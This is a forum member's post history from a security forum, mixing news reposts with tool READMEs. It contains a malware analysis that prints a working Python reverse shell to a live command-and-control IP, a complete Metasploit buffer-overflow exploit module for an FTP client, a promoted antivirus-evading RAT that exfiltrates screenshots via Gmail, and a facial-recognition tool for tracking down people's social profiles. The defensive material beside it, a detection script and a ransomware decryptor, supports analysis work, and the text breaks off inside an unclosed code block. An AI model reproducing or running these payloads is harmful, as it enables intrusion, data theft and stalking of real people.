Fi8sVrs (Posts: 3206, Days Won: 87)

Everything posted by Fi8sVrs
-
[AI] (+/-Python?): How far has the understanding of natural human language come?
Fi8sVrs replied to Che's topic in Programare
OCR. PS: let us know when you open your practice, I have some "buddies" connected via bluetooth
Photo: Mihai Ciobanu

The President of Romania, Klaus Iohannis, signed on Friday, 28 December this year, the decree promulgating the Law on ensuring a high common level of security of networks and information systems (PL-x 280/02.05.2018).

The NIS Directive (Network Internet Security) establishes at European level a unified system for preventing and responding to information security incidents, with the aim of protecting and stimulating the development of the Digital Single Market by creating adequate mechanisms at national level. In this context, the objectives of the act promulgated today are:

- establishing the framework for cooperation at national level and for participation at European and international level in the field of ensuring the security of networks and information systems,
- creating the institutional framework by designating the National Cyber Security Incident Response Centre (CERT-RO) as the competent authority,
- designating the public- and private-law entities that hold competences and responsibilities in applying the provisions of this law,
- designating the national single point of contact and the national computer security incident response team, the National Cyber Security Incident Response Centre (CERT-RO),
- establishing the security and notification requirements for operators of essential services and for digital service providers, and instituting mechanisms for updating them according to the evolution of threats to the security of networks and information systems.

Cooperation mechanisms in case of need

Thus, cooperation mechanisms are instituted, in case of need, between CERT-RO and the competent authorities for the sectors and subsectors in which operators of essential services carry out their activity, in order to prevent situations in which initially minor information security incidents affecting a digital service provider evolve rapidly and affect national or European critical infrastructure. The sectors and subsectors in which operators of essential services carry out their activity are: energy, transport, banking, financial market infrastructure, health, drinking water supply and distribution, and digital infrastructure; the law also imposes security and incident notification obligations on digital service providers such as cloud computing, online marketplaces and search engines.

Via: https://www.dcnews.ro/securitate-informatica--noi-reglementari-intrate-in-vigoare_630191.html
-
They were to be expected.
-
Hi, I'm selling a 3-letter domain, the price is negotiable, I await offers via PM. Pr: up
-
Languages (th) dude :))))
-
Wait, wait a second.. Get out of here, that 4us guy sent himself the mail.
-
Maximum Payout: Yahoo can pay $15000 for detecting important bugs in their system.
-
SharpFruit

SharpFruit is a C# port of Find-Fruit.ps1. SharpFruit is intended to aid penetration testers in finding juicy targets on internal networks without nmap scanning. As an example, one could execute SharpFruit.exe through Cobalt Strike's Beacon "execute-assembly" module.

Example usage

    beacon> execute-assembly /root/SharpFruit/SharpFruit.exe --cidr 10.10.1.0/24 --port 8080

or an example using SSL:

    beacon> execute-assembly /root/SharpFruit/SharpFruit.exe --cidr 10.10.1.0/24 --port 9443 --ssl+ --useragent "GoogleBotIsInsideYourNetwork"

Source: https://github.com/rvrsh3ll/SharpFruit.git
-
:)))))) cunnilingus, man
-
Where, man? This crappy radioirc opened it. Posted September 17
-
Yes, me.
-
Why? When you've got KRACK, WPA3
-
Selling Shares: Facebook, Twitter, Google+, LinkedIn, Mix, Pinterest, Reddit
Fi8sVrs replied to TAJ's topic in RST Market
listen to what the gypsy is saying
Early today, Remco Verhoef (@remco_verhoef) posted an interesting entry to SANS' InfoSec Handlers Diary Blog. Titled "Crypto community target of MacOS malware", he noted:

His great writeup notes the initial infection vector and provides an overview of the malware, including its method of persistence (launch daemon) and purpose (reverse shell). Here, we dive in a touch deeper into the malware and illustrate how Objective-See's tools can generically thwart this new threat, at every step of the way!

OSX.Dummy

Remco Verhoef states the malware attacks are:

Apparently attackers are asking users to infect themselves, via the following command:

    $ cd /tmp && curl -s curl $MALICIOUS_URL > script && chmod +x script && ./script

If users fall for this (rather lame) social engineering trick, a rather massive Mach-O binary will be downloaded and executed. Massive you say? Yes, it clocks in at 34M:

    $ du -h /tmp/script
    34M script

Using WhatsYourSign, we can see that the malicious binary is not signed:

Normally such a binary would be blocked by GateKeeper. However, if users are downloading and running a binary directly via terminal commands, GateKeeper does not come into play and thus the unsigned binary will be allowed to execute. Does this count as a GateKeeper bypass? Maybe? ...I guess the takeaway here is (yet again) that the built-in macOS malware mitigations should never be viewed as a panacea.

Unfortunately this binary remains 100% undetected (0/60) by all AV engines on VirusTotal:

Moving on, if we open the binary in Hopper, the reason for its size is clear. Various libraries such as OpenSSL and V8 appear to be statically compiled in:

Since it's a) Friday PM and b) this binary is massive, filled with all sorts of library code, we're going to skip static analysis and hop right into dynamic analysis. In a High Sierra virtual machine (VM) with various Objective-See tools installed, we execute the malware in order to dynamically observe its actions.

Via the ProcInfo process monitor, it's easy to passively see exactly what the malware is up to! First, the malware sets the script to be owned by root:

    # procInfo
    monitoring for process events...
    process start:
    pid: 432
    path: /usr/bin/sudo
    args: (
      "/usr/bin/sudo",
      "-S",
      "-p",
      "#node-sudo-passwd#",
      chown,
      root,
      "/tmp/script.sh"
    )

As the malware executes sudo to change the file's permissions to root, this will require the user to enter their password in the terminal. This is saved by the malware to /tmp/dumpdummy:

    # sudo fs_usage -w -f filesystem
    open    /tmp/dumpdummy    script.5354
    pwrite  F=19              script.5354
    close   F=19              script.5354

    # cat /tmp/dumpdummy
    hunter2

The malware then sets the script to be executable via chmod +x:

    # procInfo
    monitoring for process events...
    process start:
    path: /usr/bin/sudo
    user: 501
    args: (
      "/usr/bin/sudo",
      "-S",
      "-p",
      "#node-sudo-passwd#",
      chmod,
      "+x",
      "/tmp/script.sh"
    )

Following this, the malware continues by:

- moving the script into /var/root:
      mv "/tmp/script.sh" "/var/root/"
- dumping a plist file to /tmp/com.startup.plist and then moving it into the LaunchDaemons directory:
      mv "/tmp/com.startup.plist" "/Library/LaunchDaemons/"
- setting the owner of the com.startup.plist plist to root:
      chown root "/Library/LaunchDaemons/com.startup.plist"
- launching the com.startup.plist launch daemon:
      launchctl load "-w" "/Library/LaunchDaemons/com.startup.plist"

At this point the malware has persisted a malicious launch daemon. This is kindly noted by BlockBlock, which detects and alerts on this persistence attempt:

As noted in the BlockBlock alert, the path to the launch daemon plist is /Library/LaunchDaemons/com.startup.plist:

    <?xml version="1.0" encoding="UTF-8"?>
    <!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
    <plist version="1.0">
    <dict>
        <key>KeepAlive</key>
        <true/>
        <key>Label</key>
        <string>com.startup</string>
        <key>Program</key>
        <string>/var/root/script.sh</string>
        <key>RunAtLoad</key>
        <true/>
    </dict>
    </plist>

As the RunAtLoad key is set to true, the value of the Program key, /var/root/script.sh, will be automatically executed by the OS whenever the system is rebooted. Let's look at the script.sh file:

    #!/bin/bash
    while :
    do
        python -c 'import socket,subprocess,os; s=socket.socket(socket.AF_INET,socket.SOCK_STREAM); s.connect(("185.243.115.230",1337)); os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2); p=subprocess.call(["/bin/sh","-i"]);'
        sleep 5
    done

Ah, a python script! As noted by Remco Verhoef (@remco_verhoef) in his writeup, this will attempt to connect to 185.243.115.230 on port 1337. It then duplicates stdin, stdout and stderr to the socket, before executing /bin/sh with the -i flag. In other words, it's setting up an interactive reverse shell. If you have a firewall product installed, such as Objective-See's LuLu, this network activity will be detected:

If the connection to the attacker's C&C server (185.243.115.230:1337) succeeds, the attacker will be able to arbitrarily execute commands (as root!) on the infected system.

Conclusion

Today we analyzed a new piece of mac malware. I'm calling it OSX.Dummy as:

- the infection method is dumb
- the massive size of the binary is dumb
- the persistence mechanism is lame (and thus also dumb)
- the capabilities are rather limited (and thus rather dumb)
- it's trivial to detect at every step (that's dumb)
- ...and finally, the malware saves the user's password to dumpdummy

To check if you're infected, run KnockKnock as root (since the malware sets its components to be readable only by root). Look for an unsigned launch item com.startup.plist executing something named 'script.sh':

One can also look for an instance of python running as root, with the aforementioned reverse shell command:

    $ ps aux | grep -i python
    root    python -c import socket,subprocess,os; s=socket.socket(socket.AF_INET,socket.SOCK_STREAM); s.connect(("185.243.115.230",1337)); os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2); p=subprocess.call(["/bin/sh","-i"]);

Source: objective-see.com
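The two checks the post closes with (a launch item whose Program is a script.sh in a scratch or root-only directory, and a root python process carrying the reverse-shell one-liner) as an added Python triage script. This is not Objective-See's code nor KnockKnock's; it is a stand-alone example added here. The first plist is the com.startup.plist from the post; the benign plist, the `ps aux` output and the marker strings are constructed for the example.

```python
import plistlib
import re

# A root launch daemon whose program lives in a scratch or root-only directory
# is unusual; that is where OSX.Dummy parks script.sh (ASSUMPTION: list of dirs).
SUSPICIOUS_PROGRAM_DIRS = ("/tmp/", "/private/tmp/", "/var/root/", "/private/var/root/")

# Fragments of the reverse-shell one-liner: socket creation, fd duplication onto
# the socket, and an interactive /bin/sh. All three in one command line is the tell.
REVERSE_SHELL_MARKERS = ("socket.socket(", "os.dup2(", '"/bin/sh"')
C2_RE = re.compile(r'connect\(\(\s*"([^"]+)"\s*,\s*(\d+)\s*\)\)')

# The launch daemon plist shown in the post.
DUMMY_PLIST = b"""<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
  <key>KeepAlive</key><true/>
  <key>Label</key><string>com.startup</string>
  <key>Program</key><string>/var/root/script.sh</string>
  <key>RunAtLoad</key><true/>
</dict>
</plist>"""

# Constructed benign daemon for comparison (not from the post).
BENIGN_PLIST = b"""<?xml version="1.0" encoding="UTF-8"?>
<plist version="1.0">
<dict>
  <key>Label</key><string>com.example.helper</string>
  <key>ProgramArguments</key>
  <array><string>/usr/libexec/example-helper</string><string>--daemon</string></array>
  <key>RunAtLoad</key><true/>
</dict>
</plist>"""

# Constructed `ps aux` output; the root process line is the one from the post.
PS_SAMPLE = """\
USER  PID  %CPU %MEM     VSZ   RSS  TT  STAT STARTED    TIME COMMAND
root  512   0.0  0.1 4300000 12000  ??  S    10:02AM 0:00.12 python -c import socket,subprocess,os; s=socket.socket(socket.AF_INET,socket.SOCK_STREAM); s.connect(("185.243.115.230",1337)); os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2); p=subprocess.call(["/bin/sh","-i"]);
alice 613   0.0  0.2 4500000 20000  ??  S    10:03AM 0:01.00 python3 -m http.server 8000
"""


def inspect_launch_item(plist_bytes):
    """Return the reasons a LaunchDaemon plist resembles OSX.Dummy persistence
    (an empty list means nothing suspicious was found)."""
    item = plistlib.loads(plist_bytes)
    programs = []
    if isinstance(item.get("Program"), str):
        programs.append(item["Program"])
    programs += [a for a in item.get("ProgramArguments", []) if isinstance(a, str)]
    reasons = []
    for path in programs:
        if path.startswith(SUSPICIOUS_PROGRAM_DIRS):
            reasons.append("program in scratch/root-only directory: " + path)
        if path.endswith("script.sh"):
            reasons.append("generic script name: " + path)
    if item.get("RunAtLoad") and item.get("KeepAlive"):
        reasons.append("RunAtLoad + KeepAlive: started at boot and restarted if killed")
    return reasons


def find_reverse_shells(ps_output):
    """Scan `ps aux` text for python processes carrying the reverse-shell
    one-liner; returns (user, c2_host, c2_port) per hit."""
    hits = []
    for line in ps_output.splitlines()[1:]:      # skip the USER PID ... header
        fields = line.split(None, 10)            # 11th field is the whole command line
        if len(fields) < 11:
            continue
        user, cmd = fields[0], fields[10]
        if "python" not in cmd or not all(m in cmd for m in REVERSE_SHELL_MARKERS):
            continue
        m = C2_RE.search(cmd)
        hits.append((user, m.group(1) if m else "?", int(m.group(2)) if m else 0))
    return hits


if __name__ == "__main__":
    for label, blob in (("com.startup.plist", DUMMY_PLIST), ("benign", BENIGN_PLIST)):
        print(label, "->", inspect_launch_item(blob) or "clean")
    for user, host, port in find_reverse_shells(PS_SAMPLE):
        print(f"reverse shell as {user} to {host}:{port}")
```

On a live system the same two functions would be fed the bytes of each file under /Library/LaunchDaemons and the output of `ps aux`; the daemon check needs root because the malware makes its components readable only by root.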
-
macOS-Fortress

macOS-Fortress: Firewall, Blackhole, and Privatizing Proxy for Trackers, Attackers, Malware, Adware, and Spammers

Kernel-level, OS-level, and client-level security for macOS. Built to address a steady stream of attacks visible in snort and server logs, as well as to block ads and malicious scripts and conceal information used to track you around the web. After this package was installed, snort and other detections fell to a fraction with a few simple blocking actions. This setup is a lot more capable and effective than using a simple adblocking browser add-on. There's a world of difference between ad-filled web pages with and without a filtering proxy server. It's also saved me from inadvertently clicking on phishing links.

Proxy features

- macOS adaptive firewall
- Adaptive firewall against brute force attacks
- IP blocks updated about twice a day from emergingthreats.net (IP blocks, compromised hosts, malvertisers) and dshield.org's top-20
- Host blocks updated about twice a day from hphosts.net
- EasyList Tracker and Adblock Rules to Proxy Auto Configuration (PAC) proxy.pac file and Privoxy Actions and Filters
- Uses easylist-pac-privoxy and adblock2privoxy to easily incorporate multiple blocking rulesets into both PAC and Privoxy formats, including easyprivacy.txt, easylist.txt, fanboy-annoyance.txt, fanboy-social.txt, antiadblockfilters.txt, malwaredomains_full.txt, and the anti-spamware list adblock-list.txt.

The install script readme-and-install.sh installs and configures a macOS Firewall and Privatizing Proxy. It will:

- Prompt you to install Apple's Xcode Command Line Tools and Macports
- Use Macports to download and install several key utilities and applications (wget gnupg p7zip squid privoxy nmap)
- Configure macOS's PF native firewall (man pfctl, man pf.conf), squid, and privoxy
- Turn on macOS's native Apache webserver to serve the Automatic proxy configuration http://localhost/proxy.pac
- Networking on the local computer can be set up to use this Automatic Proxy Configuration without breaking App Store or other updates (see squid.conf)
- Uncomment the nat directive in pf.conf if you wish to set up an OpenVPN server
- Install and launch daemons that download and regularly update open source IP and host blacklists. The sources are emergingthreats.net (net.emergingthreats.blockips.plist), dshield.org (net.dshield.block.plist), hosts-file.net (net.hphosts.hosts.plist), and EasyList (com.github.essandess.easylist-pac.plist, com.github.essandess.adblock2privoxy.plist)
- Install a user launch daemon that deletes flash cookies not related to Adobe Flash Player settings every half-hour (http://goo.gl/k4BxuH)

After installation the connection between clients and the internet looks like this:

    Application -> proxy.pac -> Squid (port 3128) -> Privoxy (port 8118) -> Internet

An auxiliary nginx-based webserver (nominally on localhost:8119) is used both as a proxy.pac ad and tracker blackhole and for the CSS element blocking rules in the Privoxy configuration generated by adblock2privoxy.

Public Service Announcement

This firewall is configured to block all known tracker and adware content, in the browser, in-app, wherever it finds them. Many websites now offer an additional way to block ads: subscribe to their content. Security and privacy will always necessitate ad blocking, but now that this software has become mainstream with mainstream effects, ad blocker users must consider the potential impact of ad blocking on the writers and publications that are important to them. Personally, two publications that I gladly pay for, especially for their important 2016 US Presidential election coverage, are the New York Times and The Atlantic. I encourage all users to subscribe to their own preferred publications and writers.

Tracker blocking

Lightbeam, the tracking tracker Firefox add-on, shows how ad- and tracker-blocking works to prevent third parties monitoring you or your children's online activities. My daughter enjoys the learning exercises at the children's website ABCya!. The Lightbeam graph below on the left shows all the third party trackers after less than a minute of browser activity, without using a privatizing proxy. The graph on the right shows all this tracker activity blocked when this privatizing proxy is used.

[Lightbeam graph without proxy] [Lightbeam graph with proxy]

This problem is the subject of Gary Kovacs's TED talk, Tracking Our Online Trackers.

Attack blocking

The snort intrusion detection system reports far fewer events when known attack sites are blackholed by the packet filter:

[snort+BASE Overview] [snort+BASE Events]

Installation

    git clone --recurse https://github.com/essandess/macOS-Fortress.git
    cd macOS-Fortress
    sudo sh ./readme-and-install.sh

Disabling

    sudo sh ./disable.sh

Notes

- Configure the squid proxy to accept connections on the LAN IP and set LAN device Automatic Proxy Configurations to http://lan_ip/proxy.pac to protect devices on the LAN.
- Count the number of attacks since boot with the script pf_attacks. "Attack" is defined as the number of blocked IPs in PF's bruteforce table plus the number of denied connections from blacklisted IPs in the tables compromised_ips, dshield_block_ip, and emerging_threats.
- Both squid and Privoxy are configured to forge the User-Agent. The default is an iPad to allow mobile device access. Change this to your local needs if necessary.
- Whitelist or blacklist specific domain names with the files /usr/local/etc/whitelist.txt and /usr/local/etc/blacklist.txt. After editing these files, use launchctl to unload and load the plist /Library/LaunchDaemons/net.hphosts.hosts.plist, which recreates the hostfile /etc/hosts-hphost and reconfigures the squid proxy to use the updates.
- Sometimes pf and privoxy do not launch at boot, in spite of the use of their launch daemons. Fix this by hand after boot with the script macosfortress_boot_check, or individually using pf_restart, privoxy_restart, and squid_restart. And please post a solution if you find one.
- All open source updates are done using the wget -N option to save everyone's bandwidth.

Security

These services are intended to be run on a secure LAN behind a router firewall. The default proxy configuration will only accept connections made from the local computer (localhost). If you change this to accept connections from any client on your LAN, do not configure the router to forward ports 3128 or 8118, or you will be running an open web proxy.

Source
-
Security researchers at Microsoft have unveiled details of two critical and important zero-day vulnerabilities that were recently discovered after someone uploaded a malicious PDF file to VirusTotal, and which got patched before being used in the wild.

In late March, researchers at ESET found a malicious PDF file on VirusTotal, which they shared with the security team at Microsoft "as a potential exploit for an unknown Windows kernel vulnerability." After analyzing the malicious PDF file, the Microsoft team found that the same file includes two different zero-day exploits: one for Adobe Acrobat and Reader, and the other targeting Microsoft Windows.

Since the patches for both vulnerabilities were released in the second week of May, Microsoft released details of both vulnerabilities today, after giving users enough time to update their vulnerable operating systems and Adobe software.

According to the researchers, the malicious PDF including both zero-day exploits was in an early development stage, "given the fact that the PDF itself did not deliver a malicious payload and appeared to be proof-of-concept (PoC) code." It seems someone who could have combined both zero-days to build an extremely powerful cyber weapon had unintentionally and mistakenly lost the game by uploading his/her under-development exploit to VirusTotal.

The zero-day vulnerabilities in question are a remote code execution flaw in Adobe Acrobat and Reader (CVE-2018-4990) and a privilege escalation bug in Microsoft Windows (CVE-2018-8120). Leveraging shellcode execution from the first vulnerability, the attacker uses the second Windows kernel exploit to break out of the Adobe Reader sandbox and run with elevated privileges. Since this malicious PDF sample was under development at the time of detection, it apparently included a simple PoC payload that dropped an empty vbs file in the Startup folder.

Microsoft and Adobe have since released corresponding security updates for both vulnerabilities in May. For more technical details of the exploits, you can head on to the Microsoft and ESET blogs.

Via thehackernews.com
-
-
EagleEye

Jerry Shaw, you have been activated

Find your friends' Social Media Profiles with ease. This only works if their Facebook Profile is public.

What does this do?

In simple words: you have at least one image of the person you are looking for and a clue about their name. You feed this program with it and it tries to find Instagram, Youtube, Facebook and Twitter profiles of this person.

How does it work?

You give it a name and at least one photo. It then searches Facebook for this name and does facial recognition to determine the right Facebook profile. After that it does a Google and ImageRaider reverse image search to find other social media profiles. If an Instagram profile was found it will be verified by comparing your known photo of the person to some of the Instagram pictures. In the end you get a PDF report.

How to use it

Automated Prerequisites Installation

    wget https://raw.githubusercontent.com/ThoughtfulDev/EagleEye/master/pre.sh && chmod +x pre.sh && ./pre.sh

Manual Prerequisites Installation

    $ sudo apt update && sudo apt upgrade -y
    $ sudo apt install git python3 python3-pip python3-dev
    $ sudo apt install libgtk-3-dev libboost-all-dev build-essential cmake libffi-dev
    $ git clone https://github.com/ThoughtfulDev/EagleEye
    $ cd EagleEye && sudo pip3 install -r requirements.txt
    $ sudo pip3 install --upgrade beautifulsoup4 html5lib spry

Regardless of which option you choose, make sure that you have Firefox installed. If you have Firefox installed, download the latest release of the Geckodriver for your architecture.

Note: If you are using Firefox ESR (like Kali does) please use Geckodriver version 17.

Next change the value in config.json to the path of the geckodriver, e.g.

    {
      "DEFAULTS": { ... },
      "WEBDRIVER": {
        "ENGINE": "firefox",
        "PATH": "PATH TO geckodriver e.g C:\\Program Files\\geckodriver.exe"
      },
      "FILTER": [ .... ],
      ...
    }

Make the Geckodriver executable:

    $ chmod +x /path/to/geckodriver

I will try to implement the Chrome Webdriver as soon as possible.

Next put at least one image of the person you want to find in the known folder. (Has to be .jpg for now)

Then run the program:

    $ python3 eagle-eye.py

To see a list of all available options just type:

    $ python3 eagle-eye.py -h

The ImageRaider Reverse Image Search can take some minutes (1-15 minutes depending on the number of images).

Screenshots?

Example Report (Used one image of Emeraude Toubia)

Download: EagleEye-master.zip

Source
-
Powershell-RAT

Python based backdoor that uses Gmail to exfiltrate data as an e-mail attachment. This RAT will help during red team engagements to backdoor any Windows machines. It tracks the user activity using screen capture and sends the information to an attacker as an e-mail attachment.

Note: This piece of code is Fully UnDetectable (FUD) by Anti-Virus (AV) software. This project must not be used for illegal purposes or for hacking into systems where you do not have permission; it is strictly for educational purposes and for people to experiment with. Any suggestions or ideas for this tool are welcome - just tweet me on @ManiarViral

Screenshots:

- On the first run of the Powershell-RAT the user will get options as below:
- Using the Hail Mary option to backdoor a Windows machine:
- Successfully taking screenshots of the user activity:
- Data exfiltrated as an email attachment using Gmail:

Setup:

- Throwaway Gmail email address
- Enable "Allow less secure apps" by going to https://myaccount.google.com/lesssecureapps
- Modify the $username & $password variables for your account in the Mail.ps1 Powershell file
- Modify $msg.From & $msg.To.Add with the throwaway gmail address

Download: Powershell-RAT-master.zip

Source
-
This Metasploit module exploits a buffer overflow in the FTPShell client 6.70 (Enterprise edition) allowing remote code execution.

    ##
    # This module requires Metasploit: https://metasploit.com/download
    # Current source: https://github.com/rapid7/metasploit-framework
    ##

    class MetasploitModule < Msf::Exploit::Remote
      Rank = NormalRanking

      include Msf::Exploit::Remote::TcpServer

      def initialize(info = {})
        super(update_info(info,
          'Name'           => 'FTPShell client 6.70 (Enterprise edition) Stack Buffer Overflow',
          'Description'    => %q{
            This module exploits a buffer overflow in the FTPShell client 6.70
            (Enterprise edition) allowing remote code execution.
          },
          'Author'         =>
            [
              'r4wd3r',          # Original exploit author
              'Daniel Teixeira'  # MSF module author
            ],
          'License'        => MSF_LICENSE,
          'References'     =>
            [
              [ 'CVE', '2018-7573'],
              [ 'EDB', '44596' ]
            ],
          'Payload'        =>
            {
              'Space'    => 400,
              'BadChars' => "\x00\x22\x0d\x0a\x0b"
            },
          'Platform'       => 'win',
          'Targets'        =>
            [
              # CALL ESI in FTPShell.exe : 0x00452eed
              [ 'Windows Universal', {'Ret' => "\xed\x2e\x45" } ]
            ],
          'Privileged'     => false,
          'DefaultOptions' =>
            {
              'SRVHOST'  => '0.0.0.0',
              'EXITFUNC' => 'thread'
            },
          'DisclosureDate' => 'Mar 4 2017',
          'DefaultTarget'  => 0))

        register_options [
          OptPort.new('SRVPORT', [ true, 'The FTP port to listen on', 21 ])
        ]
      end

      def exploit
        srv_ip_for_client = datastore['SRVHOST']
        if srv_ip_for_client == '0.0.0.0'
          if datastore['LHOST']
            srv_ip_for_client = datastore['LHOST']
          else
            srv_ip_for_client = Rex::Socket.source_address('50.50.50.50')
          end
        end
        srv_port = datastore['SRVPORT']
        print_status("Please ask your target(s) to connect to #{srv_ip_for_client}:#{srv_port}")
        super
      end

      def on_client_connect(client)
        p = regenerate_payload(client)
        return if p.nil?

        print_status("#{client.peerhost} - connected.")
        res = client.get_once.to_s.strip
        print_status("#{client.peerhost} - Request: #{res}") unless res.empty?

        print_status("#{client.peerhost} - Response: Sending 220 Welcome")
        welcome = "220 Welcome.\r\n"
        client.put(welcome)

        res = client.get_once.to_s.strip
        print_status("#{client.peerhost} - Request: #{res}")
        print_status("#{client.peerhost} - Response: sending 331 OK")
        user = "331 OK.\r\n"
        client.put(user)

        res = client.get_once.to_s.strip
        print_status("#{client.peerhost} - Request: #{res}")
        print_status("#{client.peerhost} - Response: Sending 230 OK")
        pass = "230 OK.\r\n"
        client.put(pass)

        res = client.get_once.to_s.strip
        print_status("#{client.peerhost} - Request: #{res}")

        sploit = '220 "'
        sploit << payload.encoded
        sploit << "\x20" * (payload_space - payload.encoded.length)
        sploit << target.ret
        sploit << "\" is current directory\r\n"
        print_status("#{client.peerhost} - Request: Sending the malicious response")
        client.put(sploit)
      end
    end

Source
-
ThanatosDecryptor

ThanatosDecryptor is an executable program that attempts to decrypt certain files encrypted by the Thanatos malware. File types currently supported include:

- Image: .gif, .tif, .tiff, .jpg, .jpeg, .png
- Video: .mpg, .mpeg, .mp4, .avi
- Audio: .wav
- Document: .doc, .docx, .xls, .xlsx, .ppt, .pptx, .pdf, .odt, .ods, .odp, .rtf
- Other: .zip, .7z, .vmdk, .psd, .lnk

In order to decrypt files as quickly as possible, ThanatosDecryptor should be run on the original machine infected with the malware, and against the original .THANATOS files that it created. ThanatosDecryptor has been tested against versions 1 and 1.1 of the malware. Known malware sample hashes include:

    55aa55229ea26121048b8c5f63a8b6921f134d425fba1eabd754281ca6466b70
    97d4145285c80d757229228d13897820d0dc79ab7aa3624f40310098c167ae7e
    8df0cb230eeb16ffa70c984ece6b7445a5e2287a55d24e72796e63d96fc5d401
    bad7b8d2086ac934c01d3d59af4d70450b0c08a24bc384ec61f40e25b7fbfeb5
    02b9e3f24c84fdb8ab67985400056e436b18e5f946549ef534a364dff4a84085
    fe1eafb8e31a84c14ad5638d5fd15ab18505efe4f1becaa36eb0c1d75cd1d5a9

Thanatos Overview

When run, the Thanatos malware looks for files recursively in the following directories:

- Desktop
- Documents
- Downloads
- Favourites
- Music
- OneDrive
- Pictures
- Videos

For each file found, the malware derives an encryption key from the number of milliseconds that the infected computer has been running (via a call to GetTickCount), encrypts the file using 256-bit AES encryption, and then discards the encryption key. It would be practically impossible to brute-force guess the 256-bit AES encryption key directly, but since the malware derives this key from the system uptime (a 32-bit value), the key is effectively 32 bits in length.

On the virtual machine that I tested on, around 100,000 key derivations and AES decryption operations (on one AES block worth of data, needed for decryption success verification) could be performed every second, meaning in the worst case it would take around 12 hours to successfully guess the key if the system uptime value was random. The system uptime is not random, though. The maximum number of milliseconds you can store in a 32-bit value comes out to be 49.7 days' worth, and many people tend to shut down or hibernate their computers before then (or let them sleep from time to time). Thus, the system uptime at time of infection is likely to be a fairly low value: starting at 0 and guessing your way up is a decent approach.

A further optimization is enabled by the fact that the system uptime is written to the Windows Event Logs around once per day. Also, the malware does not modify the .THANATOS file creation dates, so with this information the search space can be reduced to approximately the number of milliseconds within the 24 hours before infection. At 100k attempts per second, it would take around 14 minutes to guess the key under these conditions.

ThanatosDecryptor Operation

When run, ThanatosDecryptor first searches the directories listed above for files with the .THANATOS file extension. Once found, the original file extension (which is preserved by the malware in the file name right before .THANATOS) is compared with the list of file types supported by ThanatosDecryptor. If the file type is one supported, the file gets queued for decryption.

ThanatosDecryptor also parses the Windows Event Log for the daily uptime messages and uses the encrypted file time metadata to determine a starting value for decryption. This value is used to derive an encryption key, an AES decryption operation is done against the file contents, and the resulting bytes are compared against values known to be at the beginning of those file types. If the comparison is unsuccessful, it increments the seed and tries this process again. Otherwise, the file is decrypted and written out with the original file name.

Finally, once one file has been successfully decrypted, ThanatosDecryptor uses the SEED value from that decryption attempt as a starting point for decryption attempts against follow-on files (since they are all likely to be very similar).

Running the Program

Download the latest ThanatosDecryptor.exe file from the Release directory and run it on the infected system as the user that had his/her files encrypted.

Building

Visual Studio is required for building. Visual Studio 2017 Community Edition works for me! To build ThanatosDecryptor from source, clone this repo, cd into the ThanatosDecryptor directory, and from the 'Developer Command Prompt for VS 2017' that ships with Visual Studio 2017, run the following command:

    msbuild ThanatosDecryptor.vcxproj /p:Configuration=Release /p:Platform=Win32

It's easiest to find the Developer Command Prompt using the Windows Start Menu search box.

Example output

    Found the following files able to be decrypted:
    C:\Users\zelda\Desktop\testfiles\test.7z.THANATOS
    C:\Users\zelda\Desktop\testfiles\Test.doc.THANATOS
    C:\Users\zelda\Desktop\testfiles\Test.docx.THANATOS
    C:\Users\zelda\Desktop\testfiles\test.gif.lnk.THANATOS
    [...]
    C:\Users\zelda\Desktop\testfiles\test.xlsx.THANATOS
    C:\Users\zelda\Desktop\testfiles\test.zip.THANATOS

    Beginning decryption attempt
    Attempting to decrypt C:\Users\zelda\Desktop\testfiles\test.7z.THANATOS
    Tried 393288 seed values thus far
    Successful decryption verification! Seed: 516031
    Successfully wrote decrypted file to: C:\Users\zelda\Desktop\testfiles\test.7z

    Attempting to decrypt C:\Users\zelda\Desktop\testfiles\Test.doc.THANATOS
    Overriding calculated SEED value for previously successful SEED value (minus 60 secs): 516031
    Tried 8257 seed values thus far
    Successful decryption verification! Seed: 516031
    Successfully wrote decrypted file to: C:\Users\zelda\Desktop\testfiles\Test.doc

    Attempting to decrypt C:\Users\zelda\Desktop\testfiles\Test.docx.THANATOS
    Overriding calculated SEED value for previously successful SEED value (minus 60 secs): 516031
    Tried 8257 seed values thus far
    Successful decryption verification! Seed: 516031
    Successfully wrote decrypted file to: C:\Users\zelda\Desktop\testfiles\Test.docx

    Attempting to decrypt C:\Users\zelda\Desktop\testfiles\test.gif.lnk.THANATOS
    Overriding calculated SEED value for previously successful SEED value (minus 60 secs): 516031
    Tried 8257 seed values thus far
    Successful decryption verification! Seed: 516046
    Successfully wrote decrypted file to: C:\Users\zelda\Desktop\testfiles\test.gif.lnk

    Attempting to decrypt C:\Users\zelda\Desktop\testfiles\test.gif.THANATOS
    Overriding calculated SEED value for previously successful SEED value (minus 60 secs): 516046
    [...]

    Attempting to decrypt C:\Users\zelda\Desktop\testfiles\test.xlsx.THANATOS
    Overriding calculated SEED value for previously successful SEED value (minus 60 secs): 516062
    Tried 8226 seed values thus far
    Successful decryption verification! Seed: 8ca3e
    Successfully wrote decrypted file to: C:\Users\zelda\Desktop\testfiles\test.xlsx

    Attempting to decrypt C:\Users\zelda\Desktop\testfiles\test.zip.THANATOS
    Overriding calculated SEED value for previously successful SEED value (minus 60 secs): 516062
    Tried 8226 seed values thus far
    Successful decryption verification! Seed: 8ca3e
    Successfully wrote decrypted file to: C:\Users\zelda\Desktop\testfiles\test.zip

    Press any key to exit

Note how some files were encrypted using the same Seed value: according to the GetTickCount man page, the uptime has a resolution of between 10ms and 16ms, which means that it can take between 10-16 ms for another call to GetTickCount to return a different value.

Download: ThanatosDecryptor-master.zip (1.8MB)

Source
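The key-recovery strategy the README describes (a 32-bit GetTickCount seed, a search window bounded by the last daily uptime message in the Event Log and the encrypted file's timestamp, verification by decrypting only the first block against known magic bytes, and reuse of the previous file's seed minus 60 seconds for follow-on files) as an added Python example. This is not ThanatosDecryptor's code. The page does not give the malware's real key derivation or AES mode, so `derive_key` (SHA-256 of the tick count) and the HMAC-based keystream are stand-ins whose only job is to make the search logic runnable with the standard library; the sample files, seeds and timestamps are constructed.

```python
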